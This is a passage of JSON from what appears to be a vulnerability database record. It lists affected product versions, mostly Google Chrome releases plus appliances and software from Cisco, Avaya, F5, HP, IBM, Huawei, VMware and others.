0.3, "vendor": "google", "version": "10.0.648.126" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.75" }, { "model": "junos space ja2500 appliance", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.71" }, { "model": "enterprise linux server eus 6.5.z", "scope": null, "trust": 0.3, "vendor": "redhat", "version": null }, { "model": "thinpro", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.611.1" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "2.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.407.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.57" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.17" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.892.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.51" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.29" }, { "model": "vsphere big data extensions", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "2.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.518.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.346.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1658.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.897.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.102" }, { "model": "oceanstor css v100r001c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.421.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.132" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.55" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.56" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "prime lan management solution", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.43" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.27" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.85" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.0" }, { "model": "ipso r75.10", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "6.2" }, { "model": "wide area application services", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "vcenter log insight", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "1.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "36.0.1985.143" }, { "model": "workload deployer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1" }, { "model": "security virtual server protection for vmware", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1003.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.382.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.927.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "3.0.195.27" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.23" }, { "model": "aura application server sip core", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "53002.0" }, { "model": "storeever esl g3 tape library 671h gs00601", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "server automation", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "10.10" }, { "model": "nexus switch for nexus series 4.0 n1", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1000v5000" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.16" }, { "model": "nac server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.55" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1021.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.20" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.23" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.462.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.21" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.77" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.3.0.3" }, { "model": "aura communication manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "vcenter server appliance update", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.51" }, { "model": "smart zero core", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "4.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.818.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.37" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.64" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.645.0" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.31" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.46" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.4" }, { "model": "network security manager", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "6.1.1539" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.126" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.23" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1065.0" }, { "model": "database appliance", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "2" }, { "model": "storeever esl g3 tape library 663h gs04601", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.37" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.674.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.39" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "57350" }, { "model": "hyper-scale manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.58" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.905.0" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10000" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.4" }, { "model": "thinpro", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "4.4" }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "gaia r71.30", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.531.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.23" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.95" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.26" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.84" }, { "model": "next generation firewall", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.0.34024" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.31" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1284.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.115" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.59" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.48" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1040.0" }, { "model": "arx", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "6.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.35" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.939.0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70006.4" }, { "model": "secureplatform r77", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "2.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.758.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.19" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.49" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.93" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.116" }, { "model": "intrusion prevention system solutions", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.37" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.99" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.184" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.154" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.112" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.48" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.42" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.23" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.32" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.344" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.419.0" }, { "model": "operations analytics", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.77" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.672.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.608.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.36" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.45" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.66" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "1.0.154.48" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.40" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.03" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.135" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.675.0" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.58" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.222.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.124" }, { "model": "high-density server dh620 v100r001c00", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "v2" }, { "model": "vcloud networking and security", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.1.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.9" }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.3.2.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1072.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.437.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.102" }, { "model": "oceanstor s2600t v200r002c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "smart zero core", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "4.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.435.0" }, { "model": "oceanstor vtl6000 v100r003c02", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.95" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.8" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50006.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.215" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.63" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.82" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.777.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.617.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.9" }, { "model": "storeever esl g3 tape library 655h gs10201", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1019.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "1.0.154.64" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.20" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.71" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.685.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.312" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.30" }, { "model": "flex system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70007.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.110" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.46" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "64" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.63" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.699.0" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.453.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.961.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.66" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.68" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.202" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "75300" }, { "model": "ucs b-series servers", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.32" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.341" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.116" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.57" }, { "model": "big-ip afm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1058" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.28" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.70" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.20" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.14" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.408.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1662.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.49" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1669.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "1.0.154.52" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1054" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.506.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.132" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.16" }, { "model": "aura experience portal sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.82" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.20" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.168" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.35" }, { "model": "big-ip pem", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1286.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.41" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.703.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.668.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.41" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.744.0" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "configuration and orchestration manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.35" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.74" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "75450" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1078.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.328.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.64" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.24" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.91" }, { "model": "sig9800 sig9800-x16 v300r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.381.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.144" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.102" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1283.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.25" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.711.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.109" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.330" }, { "model": "automation insight", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.00" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.21" }, { "model": "vcenter log insight", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "2.0" }, { "model": "ios-xe for asr1k", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.511.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.61" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.686.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.56" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.147" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.797.0" }, { "model": "secureplatform r75.20", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "2.6" }, { "model": "oic v100r001c00spc403", "scope": "ne", "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.14443" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.521.0" }, { "model": "vfabric application director", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "6.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.46" }, { "model": "enterprise linux desktop", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.68" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.59" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.774.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.19" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.34" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.36" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.458.2" }, { "model": "business edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "30000" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.46" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.350.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.418.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.50" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.803.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.49" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.41" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.623.0" }, { "model": "aura session manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.51" }, { "model": "big-ip aam", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.21" }, { "model": "iq", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.49" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "cloudsystem enterprise software", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "8.0.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.345.0" }, { "model": "secureplatform r71.30", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "2.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.215" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.28" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.23" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1001.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.21" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.686.3" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.859.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1674.1" }, { "model": "business service automation essentials", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "9.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.930.0" }, { "model": "starter kit for cloud", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.50" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.562.0" }, { "model": "gaia embedded r77.20", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.5" }, { "model": "ip office server edition", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "9.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.37" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.798.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.307.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.227" }, { "model": "oceanstor s2600t v100r003c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.302" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.416.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1077.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.63" }, { "model": "chrome", "scope": "eq", "trust": 0.3, 